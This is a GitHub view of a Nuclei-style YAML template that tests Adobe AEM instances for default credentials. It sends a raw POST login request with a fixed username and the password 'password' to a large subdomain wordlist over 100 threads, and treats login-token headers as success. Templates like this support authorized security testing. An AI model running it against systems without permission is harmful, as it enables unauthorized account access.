-
Notifications
You must be signed in to change notification settings - Fork 2
/
adobe-aem-default-credentials-8.yaml
40 lines (35 loc) · 1.13 KB
/
adobe-aem-default-credentials-8.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
id: adobe-aem-default-credentials 8
info:
name: Adobe AEM Default Credentials
author: random-robbie
severity: critical
requests:
- payloads:
Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
attack: sniper
threads: 100
raw:
- |
POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1
Host: {{Subdomains}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 67
Origin: https://{{Subdomains}}
Referer: https://{{Subdomains}}/libs/granite/core/content/login.html
Connection: close
_charset_=utf-8&j_username=matt.monroe@mailinator.com&j_password=password&j_validate=true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- login-token
- crx.default
condition: and